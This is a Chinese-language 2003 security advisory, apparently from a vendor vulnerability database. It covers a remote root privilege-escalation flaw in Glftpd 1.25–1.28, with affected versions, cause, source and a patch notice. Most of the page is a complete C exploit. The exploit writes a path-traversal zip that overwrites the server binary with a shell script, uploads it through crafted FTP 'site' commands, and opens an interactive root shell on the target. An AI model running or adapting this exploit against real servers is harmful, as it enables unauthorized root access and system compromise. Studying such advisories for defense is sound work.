安全研究
安全漏洞
Archimede's Glftpd远程权限提升漏洞
发布日期:2003-02-21
更新日期:2003-02-27
受影响系统:
Archimede's Glftpd Glftpd 1.28描述:
Archimede's Glftpd Glftpd 1.27
Archimede's Glftpd Glftpd 1.26
Archimede's Glftpd Glftpd 1.25
BUGTRAQ ID: 6910
Glftpd是一款类似serv-u的ftpd服务程序。
Glftpd的存在设计漏洞,远程攻击者可以利用这个漏洞获得chroot环境中的ROOT权限。
当在FTP服务器上增加'oneliner'字符串时,需要root用户权限来更新全局FTP文件'oneliners',不过glftpd在更新完此文件后,没有有效的丢弃root用户权限,可导致攻击者获得chroot环境中的root用户权限。
<*来源:Karol Wiêsek (appelast@bsquad.sm.pl)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=104610495228826&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/*
Glftpd 1.25 PoC remote root exploit
appelast [appelast-at-bsquad.sm.pl]
We don't need writable directory to
upload our file, we change our euid
before it to 0 :>
*/
#define TMP_ZIP "/tmp/kakaka.zip"
#define TMP_CMDS "/tmp/glcmds"
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
// shellcode ;)
signed int
shellcode[221]={80,75,3,4,10,0,0,0,0,0,83,125,-102,45,98,68,108,-96,15
,0,0,0,15,0,0,0,37,0,21,0,46,46,47,46,46,47,46,46,47,46,46,47,46,46,47
,46,46,47,46,46,47,46,46,47,46,46,47,98,105,110,47,103,108,102,116,112
,100,85,84,9,0,3,110,35,11,62,-33,99,11,62,85,120,4,0,0,0,0,0,35,33,47
,98,105,110,47,115,104,10,115,104,32,45,105,80,75,1,2,23,3,10,0,0,0,0,
0,83,125,-102,45,98,68,108,-96,15,0,0,0,15,0,0,0,37,0,13,0,0,0,0,0,1,0
,0,0,-19,-127,0,0,0,0,46,46,47,46,46,47,46,46,47,46,46,47,46,46,47,46,
46,47,46,46,47,46,46,47,46,46,47,98,105,110,47,103,108,102,116,112,100
,85,84,5,0,3,110,35,11,62,85,120,0,0,80,75,5,6,0,0,0,0,1,0,1,0,96,0,0,
0,103,0,0,0,0,0};
void usage(char *progname) {
printf("Glftpd 1.25 remote root exploit\n"
"appelast [appelast-at-bsquad.sm.pl]\n"
"usage : %s host port user password\n\n"
,progname);
}
int openhost(char *host,int port) {
int sock;
struct sockaddr_in addr;
struct hostent *he;
he=gethostbyname(host);
if (he==NULL) return -1;
sock=socket(AF_INET, SOCK_STREAM, getprotobyname("tcp")->p_proto);
if (sock==-1) return -1;
memcpy(&addr.sin_addr, he->h_addr, he->h_length);
addr.sin_family=AF_INET;
addr.sin_port=htons(port);
if(connect(sock, (struct sockaddr *)&addr, sizeof(addr)) == -1)
sock=-1;
return sock;
}
void openshell(int sock)
{
char buf[1024];
fd_set rset;
int i;
while (1)
{
FD_ZERO(&rset);
FD_SET(sock,&rset);
FD_SET(STDIN_FILENO,&rset);
select(sock+1,&rset,NULL,NULL,NULL);
if (FD_ISSET(sock,&rset))
{
i=read(sock,buf,1024);
if (i <= 0)
{
printf("The connection was closed!\n");
exit(0);
}
buf[i]=0;
puts(buf);
}
if (FD_ISSET(STDIN_FILENO,&rset))
{
i=read(STDIN_FILENO,buf,1024);
if (i>0)
{
buf[i]=0;
write(sock,buf,i);
}
}
}
}
int main(int argc, char *argv[]) {
int fd, i;
char buf[1024];
char user[25], pass[25];
memset(buf,0,1024);
usage(argv[0]);
if (argc!=5)
exit(0);
snprintf(user, 24,"%s", argv[3]);
snprintf(pass, 24,"%s", argv[4]);
printf("Creating evil .zip file : ");
fd = open(TMP_ZIP,O_RDWR|O_CREAT|O_TRUNC,0600);
if (fd<0)
{
perror("open");
exit(0);
}
for (i=0; i<221; i++)
{
(int)buf[0]=shellcode[i];
buf[1]=0;
write(fd,buf,1);
}
close(fd);
printf("DONE\n");
printf("Creating commands file : ");
fd = open(TMP_CMDS,O_RDWR|O_CREAT|O_TRUNC,0600);
if (fd<0)
{
perror("open");
exit(0);
}
sprintf(buf,"quote user %s\n"
"quote pass %s\n"
"site onel hellou\n"
"put %s %s\n"
"site ziplist --l --v -o %s\n"
"del %s\n", user, pass, TMP_ZIP, strrchr(TMP_ZIP, 0x2f)+1,
strrchr(TMP_ZIP, 0x2f)+1, strrchr(TMP_ZIP, 0x2f)+1);
write(fd, buf, strlen(buf));
close(fd);
printf("DONE\n");
printf("Exploiting ... ");
snprintf(buf, 1023, "ftp -n %s %i < /tmp/glcmds", argv[1],
atoi(argv[2]));
system(buf);
unlink(TMP_ZIP);
unlink(TMP_CMDS);
printf("DONE\n");
printf("Connecting to rootshell\n");
openshell(openhost(argv[1],atoi(argv[2])));
return 0;
}
建议:
厂商补丁:
Archimede's Glftpd
------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.glftpd.com
浏览次数:3555
严重程度:0(网友投票)
绿盟科技给您安全的保障